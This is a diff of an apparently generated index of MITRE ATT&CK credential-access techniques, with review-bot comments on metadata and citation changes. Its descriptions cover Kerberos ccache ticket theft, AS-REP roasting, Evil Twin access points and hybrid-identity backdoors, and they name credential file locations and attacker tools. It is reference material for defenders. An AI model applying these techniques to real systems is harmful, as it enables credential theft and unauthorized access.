+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44973,6 +45646,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44980,32 +45660,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
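Review bot: the Linux and macOS paragraphs removed from the T1558 description in this hunk carry detail that does not reappear in the new T1558.005 text in the first hunk: the SSSD ticket store (`/var/lib/sss/secrets/secrets.ldb` and `/var/lib/sss/secrets/.secrets.mkey`), the statement that both files require root to read, the macOS KCM daemon and Mach RPC access model, and the `ktutil` and `kcc` binaries. If the intent is to move all ccache material into T1558.005, that entry loses the root-access requirement a defender would scope file-access monitoring on; if the text mirrors the upstream ATT&CK object, flag the loss upstream rather than patching the generated index. The rest of the hunk is a key reorder for T1558.004 (`x_mitre_version` `'1.0'` to `'1.1'`, `x_mitre_permissions_required` and `spec_version` dropped, `x_mitre_attack_spec_version: 3.2.0` added, `x_mitre_platforms: - Windows` added) plus the Harmj0y reference migrating to `https://blog.harmj0y.net/activedirectory/roasting-as-reps/` with a refreshed retrieval date; those look right, and the `Sanyal, M..` double period is carried over unchanged from the old entry.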
@@ -45041,7 +45757,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -45066,13 +45782,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
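Review bot: dropping the `Kekeo` and `SpectorOps Bifrost Kerberos macOS 2019` entries here is consistent with the T1558 description change above, where their only `(Citation: ...)` markers were in the deleted Linux/macOS paragraphs, and both references reappear under T1558.005 in the first hunk with identical URLs, so no citation target is lost by this deletion.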
@@ -45081,14 +45790,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
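Review bot: removing `macOS kerberos framework MIT` and `MIT ccache` is consistent with the description hunk above (their citations were only in the deleted paragraphs), but unlike the Kekeo and SpectorOps entries, neither reference is carried over into the T1558.005 `external_references` list in the first hunk, so the primary-source MIT ccache documentation (`https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html`) and the Kerberos for Macintosh preferences page disappear from the index entirely. If T1558.005 is meant to be the home for ccache material, it should keep the MIT ccache reference.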
@@ -45110,23 +45811,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45177,12 +45869,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45194,6 +45885,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -45208,18 +45900,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
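Review bot: the only content change in this hunk is the platform swap (`Azure AD`, `Office 365`, `Google Workspace` out; `Office Suite`, `Identity Provider` in) with `x_mitre_version` moving from `'1.3'` to `'1.4'`; anything that selects index entries by platform string needs the new names, or T1552 silently drops out of filtered views for the old ones. The added `x_mitre_modified_by_ref` line, like the `x_mitre_attack_spec_version: 3.2.0` line in the previous hunk, pairs with a deletion of the same key at the bottom of the object in the next hunk, so those are moves rather than additions.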
@@ -45242,9 +45934,6 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552
atomic_tests:
- name: AWS - Retrieve EC2 Password Data using stratus
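Review bot: of the three deleted keys at the end of the T1552 object, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are re-added higher up in the same object in the two preceding hunks, so only `spec_version: '2.1'` is actually removed, matching what the patch does for the other objects. Nothing to change.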
@@ -45312,32 +46001,113 @@ credential-access:
rm -rf stratus*
name: sh
elevation_required: false
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
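Review bot: in the new T1557.004 description the sentence `the adversary may able to monitor network activity` is missing `be`; if this text is mirrored verbatim from the ATT&CK object, fix it at the source so a regenerated index does not reintroduce it. Two things to keep in mind for this object: the citation key `Australia ‘Evil Twin’` uses typographic quotes in both the `(Citation: ...)` marker and the `source_name`, so any editor or linter that normalises quotes will break the link between them; and `x_mitre_detection: ''` with `atomic_tests: []` means the entry's only defensive pointers are the two `Network Traffic` data sources. In the T1556.007 part of the hunk, the Azure AD to Entra ID wording changes correctly leave the literal service name `AzureADConnectAuthenticationAgentService` and the citation keys (`Azure AD Hybrid Identity`, `Azure AD Connect for Read Teamers`, `AADInternals Azure AD On-Prem to Cloud`, `Mandiant Azure AD Backdoors`) untouched, which is right since those are identifiers rather than prose.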
@@ -45345,9 +46115,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45356,21 +46126,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -45410,55 +46181,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
